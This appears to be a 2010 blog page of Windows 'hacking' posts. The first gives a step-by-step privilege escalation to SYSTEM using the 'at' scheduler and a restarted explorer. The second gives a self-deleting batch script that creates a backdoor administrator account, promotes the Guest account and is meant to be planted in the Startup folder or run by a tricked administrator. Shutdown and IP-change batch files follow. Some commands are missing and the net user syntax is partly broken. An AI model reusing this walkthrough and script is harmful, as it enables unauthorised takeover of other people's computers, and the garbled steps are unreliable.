Monday, June 21, 2010

Haking "admin" from "user" mode

Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:


If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM.
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc.

Hack admin account in windows

echo off
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Download the batch file and edit it.Change Username and Password to your desired ones.

You could try to trick the administrator to run the batch file with system privileges or try copying the batch file in the startup folder.The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using your username and password.

C:\Documents and Settings\All Users\Start Menu\Programs\Startup ===> [XP]

all users
C:\ProgramData\Microsoft\Windows\Start Menu ====> [Vista and Windows7]

Download batch file here:

Tuesday, June 15, 2010

computer shutdown/restart batch file

This is a batch file that shuts down or restarts the computer in one minute..
edit the shutdown /s to shutdown /a for the computer to restart.
edit the /t 60 to /t (whatever time you want)

Download the batch file here:

change IP Adrress using a batch file

Change IP Address Using netsh from Command Prompt

Network interface can be changed manually by using netsh command (netsh.exe) from Command Prompt. To change the IP to static IP, use the following command format:

netsh interface ip set address [Connection Name] [Source] [IP] [Netmask] [Gateway] [Metric]

* [Connection Name] is the connection name which the network adapter is assigned to. You can see the name in the Control Panel Network Connections panel or by using the ipconfig /all command from the command prompt.

* [Source] is the source of IP address, whether it is static or dhcp. If you set to dhcp. You can ignore all other remaining parameter.

* [IP] is the IP address you set.

* [Netmask] is the network mask for the IP address.

* [Gateway] is the the gateway IP address.

* [Metric] is the metric for the gateway.

We can now create a batch file from the above info...

Download the completed batch file here and edit...